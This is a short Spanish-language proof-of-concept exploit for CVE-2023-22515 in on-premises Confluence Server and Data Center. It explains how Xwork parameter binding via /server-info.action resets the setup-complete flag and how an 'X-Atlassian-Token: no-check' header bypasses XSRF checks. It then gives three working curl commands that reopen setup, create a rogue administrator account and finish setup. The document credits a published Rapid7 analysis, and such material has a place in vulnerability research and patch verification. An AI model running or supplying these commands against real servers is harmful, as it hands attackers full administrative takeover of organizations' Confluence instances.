
PoC para CVE-2023-22515
CVE-2023-22515, una vulnerabilidad crítica que afecta a las instancias locales de Confluence Server y Confluence Data Center, una vulnerabilidad de control de acceso roto. Attlassian ha proporcionado una puntuación base CVSS de 10.0
1- Debido a cómo los interceptores Xwork analizan los parámetros /test.action?one=a equivale a setOne()='a'; alternativamente, /test.action?one.two=a equivale a getOne().setTwo()="a"
2- Los endpoints /setup/* incluyen una llamada @ParameterSafe que nos permite usar set y get como en /setup/setupdb.action?dbConfigInfo.databaseType=postgresql; sin embargo, dado que los endpoints /setup/* están bloqueados porque la configuración está completa, se puede usar /server-info.action
3- Encuentra el método set para la configuración completa => getBootstrapStatusProvider().getApplicationConfig().setSetupComplete(false);
4- Usa el encabezado "X-Atlassian-Token" para eludir XSRF
curl http://localhost/server-info.action\?bootstrapStatusProvider.applicationConfig.setupComplete\=false\;
curl -X POST -H "X-Atlassian-Token: no-check" -d "username=haxor&fullName=leet&[email protected]&password=leet&confirm=leet&setup-next-button=Next" http://localhost/setup/setupadministrator.action\;
curl -X POST -H "X-Atlassian-Token: no-check" http://localhost/setup/finishsetup.action
DESCARGO DE RESPONSABILIDAD: El exploit no fue descubierto ni creado por mí, el crédito va para los artículos a continuación
https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis